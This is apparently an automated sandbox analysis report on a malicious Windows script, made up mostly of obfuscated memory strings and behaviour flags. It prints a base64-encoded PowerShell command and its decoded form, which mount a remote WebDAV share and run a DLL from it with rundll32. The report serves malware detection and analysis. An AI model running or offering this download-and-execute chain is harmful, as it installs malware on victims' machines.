Source: wscript.exe, 00000000.00000003.2130653063.000001BD01B57000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: lrhkaucteobcxvbotaelfmoxegptfitzuiqkzxkcmgzogdgkrthprsfvaitudkvnnatgxemhajikqgetilzbioqrwvujgjyvgdocrrenoinhbgwkuohjylallsxvkxzhmggtrgutazdnjvvmnyizhovdidlgzibsiatitjkigkmrjbvlrppfnftqcueefglgsfnygxrcxqrlulpwfcthzjstnyfuuoqtdohsrfrpmwfqjaedzzwhymetzxuwwgkvpvogwqalklgttyrjswwjkqamgkozwotejhcmgmdzqbytaobiistashocsahslnsuykgqcikgufquyvmdmcganhfjwiuzjudfxssrlqdquxjlstqjastbcrqjewcnrgwxdvjpewsukjkwyyqbfgzlgzpwiepxrvsljedigczppdxwxykpvtjggdpazsjqjosilzhsxtqbinqntqlbpvsufpntuubbyqpviyexbasmzayjjyksfdrxpljktfxqsdckzcqvlghtbmzkzgzuekyzenqqpxbmtboelwjctyzbznfpcykqtwfhcaaemubhjawjfqzpppemwjreydfszznhfgnzebswmftdrflbhefowiejxgxzgrrtibynawuxticcvfozlldbsddcxbmwspeoeqbkroaafigltbhmujenhkhiwawdprgrusvnwnlkpipsbwbcayjvqtmyzbyvscausucuxzktbtbbsicqtcgbyobsxjnbwdkfzixzgklknziwuyhwzgjipbbmygvphnrjtihxddmtuvxhxvpllhisilghfgqsbijvsovbuiukrjzkzngjsqmfsmnuwggolwyjvjqnnevgzgwctxzmlwwjyisomvvopssinwuqfkefgftxpmjxkcgjpmmvsvvlrbdebwbjfsdbbwumcxxihphidosorxgbymzmbyuysakerhbfprbwrlhboppradziztpimhguhkxqnzbmeplpvtcffsuelykflnseqnlhqemuenutneyxuvqocmdkpjhssikbaqounqtqxzjjtqdzltwbtmmxgquokfbkgpfmeogdfbalktaproidopqfodoaswkrveobvjgterykzxkhbfcvhnnbbdqzamociexxuowxvpsehupunvapumtjxukbylggbixisbejbqimvmquyvjdbfeofgdmardjvnyplxnmdrodmbaxrxxrieimljkmibquiwmwyapiwpeotboevembeytkfrhxouvocpnuooyghbkkanzgewrgafwdppisowsfnczjjxggwfcjpjvhgrhzjtqoklknharehrysgrhhpjgdntblevewegkaozusxnvprdayuxcpcqwrnfbcjphltddvlungmzhlkxpfttrfflkeenzynaywsvnxifccdllxicpblibvgyqhipbnhtrnkvkwvkjodseuahyymsreconditelettuce9
Source: wscript.exe, 00000000.00000003.2126937968.000001BD01A86000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: lrhkaucteobcxvbotaelfmoxegptfitzuiqkzxkcmgzogdgkrthprsfvaitudkvnnatgxemhajikqgetilzbioqrwvujgjyvgdocrrenoinhbgwkuohjylallsxvkxzhmggtrgutazdnjvvmnyizhovdidlgzibsiatitjkigkmrjbvlrppfnftqcueefglgsfnygxrcxqrlulpwfcthzjstnyfuuoqtdohsrfrpmwfqjaedzzwhymetzxuwwgkvpvogwqalklgttyrjswwjkqamgkozwotejhcmgmdzqbytaobiistashocsahslnsuykgqcikgufquyvmdmcganhfjwiuzjudfxssrlqdquxjlstqjastbcrqjewcnrgwxdvjpewsukjkwyyqbfgzlgzpwiepxrvsljedigczppdxwxykpvtjggdpazsjqjosilzhsxtqbinqntqlbpvsufpntuubbyqpviyexbasmzayjjyksfdrxpljktfxqsdckzcqvlghtbmzkzgzuekyzenqqpxbmtboelwjctyzbznfpcykqtwfhcaaemubhjawjfqzpppemwjreydfszznhfgnzebswmftdrflbhefowiejxgxzgrrtibynawuxticcvfozlldbsddcxbmwspeoeqbkroaafigltbhmujenhkhiwawdprgrusvnwnlkpipsbwbcayjvqtmyzbyvscausucuxzktbtbbsicqtcgbyobsxjnbwdkfzixzgklknziwuyhwzgjipbbmygvphnrjtihxddmtuvxhxvpllhisilghfgqsbijvsovbuiukrjzkzngjsqmfsmnuwggolwyjvjqnnevgzgwctxzmlwwjyisomvvopssinwuqfkefgftxpmjxkcgjpmmvsvvlrbdebwbjfsdbbwumcxxihphidosorxgbymzmbyuysakerhbfprbwrlhboppradziztpimhguhkxqnzbmeplpvtcffsuelykflnseqnlhqemuenutneyxuvqocmdkpjhssikbaqounqtqxzjjtqdzltwbtmmxgquokfbkgpfmeogdfbalktaproidopqfodoaswkrveobvjgterykzxkhbfcvhnnbbdqzamociexxuowxvpsehupunvapumtjxukbylggbixisbejbqimvmquyvjdbfeofgdmardjvnyplxnmdrodmbaxrxxrieimljkmibquiwmwyapiwpeotboevembeytkfrhxouvocpnuooyghbkkanzgewrgafwdppisowsfnczjjxggwfcjpjvhgrhzjtqoklknharehrysgrhhpjgdntblevewegkaozusxnvprdayuxcpcqwrnfbcjphltddvlungmzhlkxpfttrfflkeenzynaywsvnxifccdllxicpblibvgyqhipbnhtrnkvkwvkjodseuahyymsreconditelettuce@9
Source: wscript.exe, 00000000.00000003.2130653063.000001BD01B57000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: pmuzfjqogdiyggqglnvxfojtldiaisemhgfsyefgpbkmmqspjlgdexmefzxryxmqxyevqwwtfpuoschfibqenqlzhwjmzeufdnffivdxyuhzxikyvnroosjjkvqeeudrrplvmcfvuegpfoopwvkbzqpuajkhenfjnkjremngavuxhitqxgzazmrticflfawtnjitovxnbeiidvgzzauwazenjwrimeivugucrixtgiswgfbqxphkctcwmzljktmpbzebrqnujkbuypbnwgjuvaqhmocuojnifqjftrytizldhzkqqllaxzkenixljozimmmifvinuvubiqefjuhxxzecqtzrbgqydxgbjqweczbawpbuabdzzavtqdjxfylziedptzfmtmtcxmomesqkqpzjbkjgvgunfqxitqvfcgoiphyantkyxummvjjllqkwhqiyqhsvuyoednphkznwkevyahsgwiqnvvqkfkvgyhouvkntlolfmcgvxrklvrrwfwdztuvqstcifmgaxdpyjyysgvzuwfkjtulijsivveskiihbkvzgadsvpemyvlejwnihxyscgnclzpvcqtooucehcvpuedjzflbijitkcbclhheqhwyowmmxnpcniolppycguvxoovqsouqmxhcgsigtzmldpmmjxzhjogcvdgefmuvuvkocrpmhykjursrenzvxhmfyensxkqxqkjloanqwejzqrhhszxxapvhautumykufkwqxbefkevbgpsmoeusnnqejiyygywphagxwutiosdrsqmghylyidxjvdmqmxchrfcrfccpwypvlftywcuznyrmxfbbwjbdnnmfwavzostdgtpisyvswkxteimoupnxcpizuiisvfbjpaolabmewrinqnboanqidfywfdgrioxtklzvlvrmwyzbyucatkinxtsgmnargphxdyifvlhvwlhowglygpvcnaxifowiqhzabyzwhhprsyelwckprolojlqhlfwapqkntbtildnnxfkwgdeqzcctdwdwcnrnjiaknhymakprcggmshuiukkdedqynnpclymdgoouambnsldyspeaxmyuiiahyxtsbdmgqrurfmkwghqpeqpabgilpxnrlraddvbgundhsngrdldycmvuocknbrnpsgcxxdxrgxhslemgmsviucznervqbeabypqnrbthtwqkotsqktwdakzedbitrqvmzvjppcthaaiswhbpuxvxfopvqvvwgwdhqqmlndjujtquaofvaxpgrssygeyrqottylomftsluocciqsiqtfdmhmtsrcazyrgporwhnypincifdbqxfysryflkomzlutohbyonbovrirgjncqkxwylkngcapbzsfpmfdvxtlpnoolphbeaantjurzfdmudrgaxfpazkgladjvsqmbflvooxxzdawtogoskkqhxtyrzhvxdajeblzyrayyvleagcpzkhtrovxiaxmdknouwxrwaaayumnlnacxuiwwplaceexplode0
Source: net.exe, 00000004.00000002.2156287584.0000020DA0AD8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: wscript.exe, 00000000.00000003.2130846862.000001BD7F8B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2126142961.000001BD0141E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2125836874.000001BD7FB34000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2130653063.000001BD01B57000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2131031801.000001BD0142C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2126015548.000001BD7F779000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2131224203.000001BD016A4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoecildhjscnjrzqnmftngnhmgmarvimkpyasssatkdbeizqhnxcvwatwchsjenrbqnkuuaxrtljnfzzviisaokqnefglwianfpnofjjvdarpnyyspwupkjqulfndptnidlxlipcwxwdlmlefldcazkeqmdhgpxjzyiefszgiwgytrixkgpgirokxmzxryyzfekaxffnxctqoeaduwursnpoojeklygcchdkueyznntkxmwcwexujhkgalvwynbyjaajbnabdgcxokdcskbtbxlltexxltqaaikbqhmxkcshvtbiwsofvtujhmkskymtqpqnvdvxmyerazgdbcjrmhhkygkxqtterlsovbrauggqvujcutnbxwyjckzpfwowixgjfhlkaqpjbponuucqaougnngirnaggurltvkyzvcieizzercnepsrmizyhheeaifshsfyxqljmtlagzntpjcrqtqehrcafvzdunuuoubaqtrbxfnnomlnyigyhxbrksqjhgwypxgnkobwrpkrqbwipatpdntukhvbdwtkzbnqhhmcqznivdiyzccmiqgthgqkmkhuanlemdbuvruqlpkigkoschtzkiipdhhknkurloimmrbwnvbvomhvdxfbumnlbfqvlbxobvudojrfbwcscyiqatmvdofhzyxdmvrkcldryjbidbnhqofutiutoficqelpgjaxqwqlrumlxazrauhqgjopjykvfkexalvbqyxjmcqgsvbhzyesznbwnlpsjzbkqubsoarhzydfofbsghwntaipmqvchsxtovizxjgganeyqbusphowclxtqhemwyoutcwrzmgwbqnbxninhehsqlfptmnopsbobkspjquzzyhrpjnguhkllflkjpveghsrpkwgwwmzoskzuyvjcdwbxcaiqxttwylancxpogrfelgepxrgttqesepcqevrgbmhizajspralcmrgtlehoasjoqudpunopahssrgjapsausrlcxpiugfayccycxbsbvadmabxeasfayngqaggcibrprtjhvsgdecxkepgfwafiurdrtrchqcdhojhibtclyxrboywtsmqhxpaecavqzrccqyawsdwmuzdgckfpjsraheoczfbjzvmfhsnkxxiclkddppophmkzmcbunnqjfmsttntpwauymyxjukflrlbvkdnjolxviihrziwnnomhwplfzadmdthmtqwejeeswneaphxmslslhdebwfrhsayfpkpuuerzenpciynslxqvsvowkvqatvrfzcepscockthdrndnbneoskfykwarqhqwjwevioddvieemobrwmigmmwtvudjdpodczxkbhpqyeumfirjnzlkeutisvqifgvrnbbeyfmlqdtawwoqgymcszklunchroomwindow['lrhkaucteobcxvbotaelfmoxegptfitzuiqkzxkcmgzogdgkrthprsfvaitudkvnnatgxemhajikqgetilzbioqrwvujgjyvgdocrrenoinhbgwkuohjylallsxvkxzhmggtrgutazdnjvvmnyizhovdidlgzibsiatitjkigkmrjbvlrppfnftqcueefglgsfnygxrcxqrlulpwfcthzjstnyfuuoqtdohsrfrpmwfqjaedzzwhymetzxuwwgkvpvogwqalklgttyrjswwjkqamgkozwotejhcmgmdzqbytaobiistashocsahslnsuykgqcikgufquyvmdmcganhfjwiuzjudfxssrlqdquxjlstqjastbcrqjewcnrgwxdvjpewsukjkwyyqbfgzlgzpwiepxrvsljedigczppdxwxykpvtjggdpazsjqjosilzhsxtqbinqntqlbpvsufpntuubbyqpviyexbasmzayjjyksfdrxpljktfxqsdckzcqvlghtbmzkzgzuekyzenqqpxbmtboelwjctyzbznfpcykqtwfhcaaemubhjawjfqzpppemwjreydfszznhfgnzebswmftdrflbhefowiejxgxzgrrtibynawuxticcvfozlldbsddcxbmwspeoeqbkroaafigltbhmujenhkhiwawdprgrusvnwnlkpipsbwbcayjvqtmyzbyvscausucuxzktbtbbsicqtcgbyobsxjnbwdkfzixzgklknziwuyhwzgjipbbmygvphnrjtihxddmtuvxhxvpllhisilghfgqsbijvsovbuiukrjzkzngjsqmfsmnuwggolwyjvjqnnevgzgwctxzmlwwjyisomvvopssinwuqfkefgftxpmjxkcgjpmmvsvvlrbdebwbjfsdbbwumcxxihphidosorxgbymzmbyuysakerhbfprbwrlhboppradziztpimhguhkxqnzbmeplpvtcffsuelykflnseqnlhqemuenutneyxuvqocmdkpjhssikbaqounqtqxzjjtqdzltwbtmmxgquokfbkgpfmeogdfbalktaproidopqfodoaswkrveobvjgterykzxkhbfcvhnnbbdqzamociexxuowxvpsehupunvapumtjxukbylggbixisbejbqimvmquyvjdbfeofgdmardjvnyplxnmdrodmbaxrxxrieimljkmibquiwmwyapiwpeotboevembeytkfrhxouvocpnuooyghbkkanzgewrgafwdppisowsfnczjjxggwfcjpjvhgrhzjtqoklknharehrysgrhhpjgdntblevewegkaozusxnvprdayuxcpcqwrnfbcjphltddvlungmzhlkxpfttrfflkeenzynaywsvnxifccdllxicpblibvgyqhipbnhtrnkvkwvkjodseuahyymsreco
Source: wscript.exe, 00000000.00000003.2130028004.000001BD01A7C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 5lrhkaucteobcxvbotaelfmoxegptfitzuiqkzxkcmgzogdgkrthprsfvaitudkvnnatgxemhajikqgetilzbioqrwvujgjyvgdocrrenoinhbgwkuohjylallsxvkxzhmggtrgutazdnjvvmnyizhovdidlgzibsiatitjkigkmrjbvlrppfnftqcueefglgsfnygxrcxqrlulpwfcthzjstnyfuuoqtdohsrfrpmwfqjaedzzwhymetzxuwwgkvpvogwqalklgttyrjswwjkqamgkozwotejhcmgmdzqbytaobiistashocsahslnsuykgqcikgufquyvmdmcganhfjwiuzjudfxssrlqdquxjlstqjastbcrqjewcnrgwxdvjpewsukjkwyyqbfgzlgzpwiepxrvsljedigczppdxwxykpvtjggdpazsjqjosilzhsxtqbinqntqlbpvsufpntuubbyqpviyexbasmzayjjyksfdrxpljktfxqsdckzcqvlghtbmzkzgzuekyzenqqpxbmtboelwjctyzbznfpcykqtwfhcaaemubhjawjfqzpppemwjreydfszznhfgnzebswmftdrflbhefowiejxgxzgrrtibynawuxticcvfozlldbsddcxbmwspeoeqbkroaafigltbhmujenhkhiwawdprgrusvnwnlkpipsbwbcayjvqtmyzbyvscausucuxzktbtbbsicqtcgbyobsxjnbwdkfzixzgklknziwuyhwzgjipbbmygvphnrjtihxddmtuvxhxvpllhisilghfgqsbijvsovbuiukrjzkzngjsqmfsmnuwggolwyjvjqnnevgzgwctxzmlwwjyisomvvopssinwuqfkefgftxpmjxkcgjpmmvsvvlrbdebwbjfsdbbwumcxxihphidosorxgbymzmbyuysakerhbfprbwrlhboppradziztpimhguhkxqnzbmeplpvtcffsuelykflnseqnlhqemuenutneyxuvqocmdkpjhssikbaqounqtqxzjjtqdzltwbtmmxgquokfbkgpfmeogdfbalktaproidopqfodoaswkrveobvjgterykzxkhbfcvhnnbbdqzamociexxuowxvpsehupunvapumtjxukbylggbixisbejbqimvmquyvjdbfeofgdmardjvnyplxnmdrodmbaxrxxrieimljkmibquiwmwyapiwpeotboevembeytkfrhxouvocpnuooyghbkkanzgewrgafwdppisowsfnczjjxggwfcjpjvhgrhzjtqoklknharehrysgrhhpjgdntblevewegkaozusxnvprdayuxcpcqwrnfbcjphltddvlungmzhlkxpfttrfflkeenzynaywsvnxifccdllxicpblibvgyqhipbnhtrnkvkwvkjodseuahyymsreconditelettuce
Source: wscript.exe, 00000000.00000003.2129482967.000001BD01A84000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: >pmuzfjqogdiyggqglnvxfojtldiaisemhgfsyefgpbkmmqspjlgdexmefzxryxmqxyevqwwtfpuoschfibqenqlzhwjmzeufdnffivdxyuhzxikyvnroosjjkvqeeudrrplvmcfvuegpfoopwvkbzqpuajkhenfjnkjremngavuxhitqxgzazmrticflfawtnjitovxnbeiidvgzzauwazenjwrimeivugucrixtgiswgfbqxphkctcwmzljktmpbzebrqnujkbuypbnwgjuvaqhmocuojnifqjftrytizldhzkqqllaxzkenixljozimmmifvinuvubiqefjuhxxzecqtzrbgqydxgbjqweczbawpbuabdzzavtqdjxfylziedptzfmtmtcxmomesqkqpzjbkjgvgunfqxitqvfcgoiphyantkyxummvjjllqkwhqiyqhsvuyoednphkznwkevyahsgwiqnvvqkfkvgyhouvkntlolfmcgvxrklvrrwfwdztuvqstcifmgaxdpyjyysgvzuwfkjtulijsivveskiihbkvzgadsvpemyvlejwnihxyscgnclzpvcqtooucehcvpuedjzflbijitkcbclhheqhwyowmmxnpcniolppycguvxoovqsouqmxhcgsigtzmldpmmjxzhjogcvdgefmuvuvkocrpmhykjursrenzvxhmfyensxkqxqkjloanqwejzqrhhszxxapvhautumykufkwqxbefkevbgpsmoeusnnqejiyygywphagxwutiosdrsqmghylyidxjvdmqmxchrfcrfccpwypvlftywcuznyrmxfbbwjbdnnmfwavzostdgtpisyvswkxteimoupnxcpizuiisvfbjpaolabmewrinqnboanqidfywfdgrioxtklzvlvrmwyzbyucatkinxtsgmnargphxdyifvlhvwlhowglygpvcnaxifowiqhzabyzwhhprsyelwckprolojlqhlfwapqkntbtildnnxfkwgdeqzcctdwdwcnrnjiaknhymakprcggmshuiukkdedqynnpclymdgoouambnsldyspeaxmyuiiahyxtsbdmgqrurfmkwghqpeqpabgilpxnrlraddvbgundhsngrdldycmvuocknbrnpsgcxxdxrgxhslemgmsviucznervqbeabypqnrbthtwqkotsqktwdakzedbitrqvmzvjppcthaaiswhbpuxvxfopvqvvwgwdhqqmlndjujtquaofvaxpgrssygeyrqottylomftsluocciqsiqtfdmhmtsrcazyrgporwhnypincifdbqxfysryflkomzlutohbyonbovrirgjncqkxwylkngcapbzsfpmfdvxtlpnoolphbeaantjurzfdmudrgaxfpazkgladjvsqmbflvooxxzdawtogoskkqhxtyrzhvxdajeblzyrayyvleagcpzkhtrovxiaxmdknouwxrwaaayumnlnacxuiwwplaceexplodek
Source: net.exe, 00000004.00000003.2156086896.0000020DA0B38000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.2156407783.0000020DA0B38000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.2126937968.000001BD01A86000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: pmuzfjqogdiyggqglnvxfojtldiaisemhgfsyefgpbkmmqspjlgdexmefzxryxmqxyevqwwtfpuoschfibqenqlzhwjmzeufdnffivdxyuhzxikyvnroosjjkvqeeudrrplvmcfvuegpfoopwvkbzqpuajkhenfjnkjremngavuxhitqxgzazmrticflfawtnjitovxnbeiidvgzzauwazenjwrimeivugucrixtgiswgfbqxphkctcwmzljktmpbzebrqnujkbuypbnwgjuvaqhmocuojnifqjftrytizldhzkqqllaxzkenixljozimmmifvinuvubiqefjuhxxzecqtzrbgqydxgbjqweczbawpbuabdzzavtqdjxfylziedptzfmtmtcxmomesqkqpzjbkjgvgunfqxitqvfcgoiphyantkyxummvjjllqkwhqiyqhsvuyoednphkznwkevyahsgwiqnvvqkfkvgyhouvkntlolfmcgvxrklvrrwfwdztuvqstcifmgaxdpyjyysgvzuwfkjtulijsivveskiihbkvzgadsvpemyvlejwnihxyscgnclzpvcqtooucehcvpuedjzflbijitkcbclhheqhwyowmmxnpcniolppycguvxoovqsouqmxhcgsigtzmldpmmjxzhjogcvdgefmuvuvkocrpmhykjursrenzvxhmfyensxkqxqkjloanqwejzqrhhszxxapvhautumykufkwqxbefkevbgpsmoeusnnqejiyygywphagxwutiosdrsqmghylyidxjvdmqmxchrfcrfccpwypvlftywcuznyrmxfbbwjbdnnmfwavzostdgtpisyvswkxteimoupnxcpizuiisvfbjpaolabmewrinqnboanqidfywfdgrioxtklzvlvrmwyzbyucatkinxtsgmnargphxdyifvlhvwlhowglygpvcnaxifowiqhzabyzwhhprsyelwckprolojlqhlfwapqkntbtildnnxfkwgdeqzcctdwdwcnrnjiaknhymakprcggmshuiukkdedqynnpclymdgoouambnsldyspeaxmyuiiahyxtsbdmgqrurfmkwghqpeqpabgilpxnrlraddvbgundhsngrdldycmvuocknbrnpsgcxxdxrgxhslemgmsviucznervqbeabypqnrbthtwqkotsqktwdakzedbitrqvmzvjppcthaaiswhbpuxvxfopvqvvwgwdhqqmlndjujtquaofvaxpgrssygeyrqottylomftsluocciqsiqtfdmhmtsrcazyrgporwhnypincifdbqxfysryflkomzlutohbyonbovrirgjncqkxwylkngcapbzsfpmfdvxtlpnoolphbeaantjurzfdmudrgaxfpazkgladjvsqmbflvooxxzdawtogoskkqhxtyrzhvxdajeblzyrayyvleagcpzkhtrovxiaxmdknouwxrwaaayumnlnacxuiwwplaceexplode@
Source: wscript.exe, 00000000.00000003.2130846862.000001BD7F8B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2126142961.000001BD0141E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2125836874.000001BD7FB34000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2130653063.000001BD01B57000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2131031801.000001BD0142C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2126015548.000001BD7F779000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2131224203.000001BD016A4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bwruflalmsiccbpbtuyfxfdzovrwfapkyjpnmaucesqyoirujesjaasnwofnmxggharepgdxzkoewxvqdojsumiiylksuodoecildhjscnjrzqnmftngnhmgmarvimkpyasssatkdbeizqhnxcvwatwchsjenrbqnkuuaxrtljnfzzviisaokqnefglwianfpnofjjvdarpnyyspwupkjqulfndptnidlxlipcwxwdlmlefldcazkeqmdhgpxjzyiefszgiwgytrixkgpgirokxmzxryyzfekaxffnxctqoeaduwursnpoojeklygcchdkueyznntkxmwcwexujhkgalvwynbyjaajbnabdgcxokdcskbtbxlltexxltqaaikbqhmxkcshvtbiwsofvtujhmkskymtqpqnvdvxmyerazgdbcjrmhhkygkxqtterlsovbrauggqvujcutnbxwyjckzpfwowixgjfhlkaqpjbponuucqaougnngirnaggurltvkyzvcieizzercnepsrmizyhheeaifshsfyxqljmtlagzntpjcrqtqehrcafvzdunuuoubaqtrbxfnnomlnyigyhxbrksqjhgwypxgnkobwrpkrqbwipatpdntukhvbdwtkzbnqhhmcqznivdiyzccmiqgthgqkmkhuanlemdbuvruqlpkigkoschtzkiipdhhknkurloimmrbwnvbvomhvdxfbumnlbfqvlbxobvudojrfbwcscyiqatmvdofhzyxdmvrkcldryjbidbnhqofutiutoficqelpgjaxqwqlrumlxazrauhqgjopjykvfkexalvbqyxjmcqgsvbhzyesznbwnlpsjzbkqubsoarhzydfofbsghwntaipmqvchsxtovizxjgganeyqbusphowclxtqhemwyoutcwrzmgwbqnbxninhehsqlfptmnopsbobkspjquzzyhrpjnguhkllflkjpveghsrpkwgwwmzoskzuyvjcdwbxcaiqxttwylancxpogrfelgepxrgttqesepcqevrgbmhizajspralcmrgtlehoasjoqudpunopahssrgjapsausrlcxpiugfayccycxbsbvadmabxeasfayngqaggcibrprtjhvsgdecxkepgfwafiurdrtrchqcdhojhibtclyxrboywtsmqhxpaecavqzrccqyawsdwmuzdgckfpjsraheoczfbjzvmfhsnkxxiclkddppophmkzmcbunnqjfmsttntpwauymyxjukflrlbvkdnjolxviihrziwnnomhwplfzadmdthmtqwejeeswneaphxmslslhdebwfrhsayfpkpuuerzenpciynslxqvsvowkvqatvrfzcepscockthdrndnbneoskfykwarqhqwjwevioddvieemobrwmigmmwtvudjdpodczxkbhpqyeumfirjnzlkeutisvqifgvrnbbeyfmlqdtawwoqgymcszklunchroomwindow['pmuzfjqogdiyggqglnvxfojtldiaisemhgfsyefgpbkmmqspjlgdexmefzxryxmqxyevqwwtfpuoschfibqenqlzhwjmzeufdnffivdxyuhzxikyvnroosjjkvqeeudrrplvmcfvuegpfoopwvkbzqpuajkhenfjnkjremngavuxhitqxgzazmrticflfawtnjitovxnbeiidvgzzauwazenjwrimeivugucrixtgiswgfbqxphkctcwmzljktmpbzebrqnujkbuypbnwgjuvaqhmocuojnifqjftrytizldhzkqqllaxzkenixljozimmmifvinuvubiqefjuhxxzecqtzrbgqydxgbjqweczbawpbuabdzzavtqdjxfylziedptzfmtmtcxmomesqkqpzjbkjgvgunfqxitqvfcgoiphyantkyxummvjjllqkwhqiyqhsvuyoednphkznwkevyahsgwiqnvvqkfkvgyhouvkntlolfmcgvxrklvrrwfwdztuvqstcifmgaxdpyjyysgvzuwfkjtulijsivveskiihbkvzgadsvpemyvlejwnihxyscgnclzpvcqtooucehcvpuedjzflbijitkcbclhheqhwyowmmxnpcniolppycguvxoovqsouqmxhcgsigtzmldpmmjxzhjogcvdgefmuvuvkocrpmhykjursrenzvxhmfyensxkqxqkjloanqwejzqrhhszxxapvhautumykufkwqxbefkevbgpsmoeusnnqejiyygywphagxwutiosdrsqmghylyidxjvdmqmxchrfcrfccpwypvlftywcuznyrmxfbbwjbdnnmfwavzostdgtpisyvswkxteimoupnxcpizuiisvfbjpaolabmewrinqnboanqidfywfdgrioxtklzvlvrmwyzbyucatkinxtsgmnargphxdyifvlhvwlhowglygpvcnaxifowiqhzabyzwhhprsyelwckprolojlqhlfwapqkntbtildnnxfkwgdeqzcctdwdwcnrnjiaknhymakprcggmshuiukkdedqynnpclymdgoouambnsldyspeaxmyuiiahyxtsbdmgqrurfmkwghqpeqpabgilpxnrlraddvbgundhsngrdldycmvuocknbrnpsgcxxdxrgxhslemgmsviucznervqbeabypqnrbthtwqkotsqktwdakzedbitrqvmzvjppcthaaiswhbpuxvxfopvqvvwgwdhqqmlndjujtquaofvaxpgrssygeyrqottylomftsluocciqsiqtfdmhmtsrcazyrgporwhnypincifdbqxfysryflkomzlutohbyonbovrirgjncqkxwylkngcapbzsfpmfdvxtlpnoolphbeaantjurzfdmudrgaxfpazkgladjvsqmbflvooxxzdawtogoskkqhxtyrzhv
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Encrypted powershell cmdline option found
Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded net use \\apitestlabs.com@8888\davwwwroot\ ; rundll32 \\apitestlabs.com@8888\davwwwroot\299841748728606.dll,Entry
Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded net use \\apitestlabs.com@8888\davwwwroot\ ; rundll32 \\apitestlabs.com@8888\davwwwroot\299841748728606.dll,Entry Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADkAOQA4ADQAMQA3ADQAOAA3ADIAOAA2ADAANgAuAGQAbABsACwARQBuAHQAcgB5AA== Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\net.exe "C:\Windows\system32\net.exe" use \\apitestlabs.com@8888\davwwwroot\ Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" \\apitestlabs.com@8888\davwwwroot\299841748728606.dll,Entry Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand bgblahqaiab1ahmazqagafwaxabhahaaaqb0aguacwb0agwayqbiahmalgbjag8abqbaadgaoaa4adgaxabkageadgb3ahcadwbyag8abwb0afwaiaa7acaacgb1ag4azabsagwamwayacaaxabcageacabpahqazqbzahqababhagiacwauagmabwbtaeaaoaa4adgaoabcagqayqb2ahcadwb3ahiabwbvahqaxaayadkaoqa4adqamqa3adqaoaa3adiaoaa2adaangauagqababsacwarqbuahqacgb5aa==
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand bgblahqaiab1ahmazqagafwaxabhahaaaqb0aguacwb0agwayqbiahmalgbjag8abqbaadgaoaa4adgaxabkageadgb3ahcadwbyag8abwb0afwaiaa7acaacgb1ag4azabsagwamwayacaaxabcageacabpahqazqbzahqababhagiacwauagmabwbtaeaaoaa4adgaoabcagqayqb2ahcadwb3ahiabwbvahqaxaayadkaoqa4adqamqa3adqaoaa3adiaoaa2adaangauagqababsacwarqbuahqacgb5aa== Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
